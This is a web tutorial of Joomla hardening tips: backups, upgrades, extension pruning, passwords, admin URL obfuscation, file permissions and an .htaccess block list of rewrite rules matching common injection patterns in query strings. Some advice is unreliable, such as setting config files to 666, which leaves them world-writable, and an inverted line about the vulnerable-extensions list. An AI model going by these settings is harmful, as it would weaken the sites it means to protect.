Joomla is becoming one of the most popular websites Content Management System (CMS) with hundreds of millions of Joomla websites and thousands more be built every day, it isn\u2019t surprising if many hackers want to attack it. In fact, there were many Joomla websites which were defaced because of the ignorance of their administrators.<\/p>\n
However, you don\u2019t need to worry!
\nIn this tutorial, we will show you several tips and neat tricks, which will keep your Joomla website safely.<\/p>\n
Take time to make a troubleshooting plan before your site visited by hackers. You always remember: \u201cBackup early and often\u201d to protect your data. This gives you the certainty that if something goes wrong with your Joomla website, you can restore it at any time you want. Then you only need to find vulnerabilities on a website.<\/p>\n
If your website is running Joomla 1.0 or 1.5, you should upgrade to Joomla 2.5 or 3.0. In the higher versions, there are many security improvements in the core elements of the application. However, you should do with caution \u201calways backup your Joomla before proceeding with the upgrade\u201d. For more information, you can check Joomla tutorial<\/a>.<\/p>\n The extension of third-party make Joomla extremely popular, but it\u2019s also a way to enter your website. In addition, you need to update regularly for each different extension. So, you should consider that expansion is really necessary. You install many extensions, but don\u2019t use them? This is not only a weakness but also garbage for your website. Please use the uninstall function to totally get rid of the extension to avoid trouble.<\/p>\n The hacker usually attacks on weak passwords. You should regularly change your password and use all: uppercase, lowercase, special characters, numbers. Always use URLs search engine friendly. This not only improved the website’s Google ranking but also prevent hackers exploit to use Google\u2019s search results.<\/p>\n Standard Joomla address is http:\/\/www.yoursite.com\/administrator. In order to secure your site against attack, you can rename it to be something like http:\/\/www.yoursite.com\/administrator?wewroi4459<\/p>\n Most of vulnerabilities only occur in a specific release of a specific extension. This is why you should remove the information about the version number of any extension is installed. Remove the version number may prevent an attack before it can happen. Setting files or folders to a CHMOD of 777 or 707<\/a> is only necessary when a script needs to write to that file or directory. All other files should have the following configuration: You should turn off Register_globals, however, you must know that it can disable PHP script to work and maybe affect other programs that you are using on the website. These checklists will point you in the right direction and inform you of typical security. So, make sure you went through all of the steps.<\/p>\n3. Careful management of installed extensions.<\/h4>\n
\nMake sure the following steps:
\n– Run code review for any extension used.
\n– Review Vulnerable Extensions List<\/a> to make sure any 3rd party extensions versions used appear on the vulnerable list.
\n– Update and patch for extensions when it\u2019s necessary.
\nRemember that an extension, which isn\u2019t safe, can be harmful to your entire website.<\/p>\n4. Remove unused files.<\/h4>\n
5. Password protection:<\/h4>\n
\nThe database is very important. The SQL injection attack or any other attack on the database can make your effort lost. Make sure that your database access is protected at MySQL.<\/p>\n6. Use URLs search engine friendly:<\/h4>\n
7. Change URL for administration security.<\/h4>\n
8. Remove version number, name of extensions.<\/h4>\n
\nShowing My Extension version 2.5 is really bad thing. You can modify this message with only the name of the extension by doing the following:
\n<\/p>\n\n
9. Use the correct CHMOD for each folder and file<\/h4>\n
\n\u2022 PHP files: 644
\n\u2022 Config files: 666
\n\u2022 Other folders: 755
\n10. Change your .htaccess file:
\n01.########## Begin – Rewrite rules to block out some common exploits
\n02.#
\n03.# Block out any script trying to set a mosConfig value through the URL
\n04.RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
\n05.# Block out any script trying to base64_encode crap to send via URL
\n06.RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
\n07.# Block out any script that includes a < script> tag in URL
\n08.RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
\n09.# Block out any script trying to set a PHP GLOBALS variable via URL
\n10.RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
\n11.# Block out any script trying to modify a _REQUEST variable via URL
\n12.RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]
\n13.# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
\n14.RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]
\n15.# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
\n16.RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]
\n17.RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)
\n18.# Send all blocked request to homepage with 403 Forbidden error!
\n19.RewriteRule ^(.*)$ index.php [F,L]
\n20.#
\n21.########## End – Rewrite rules to block out some common exploits<\/p>\n11. Turn off Register_globals<\/h4>\n
\nTo make it, you just edit the php.ini file in the root directory of your domain name.<\/p>\n12. Review and action Security Checklist<\/a>:<\/h4>\n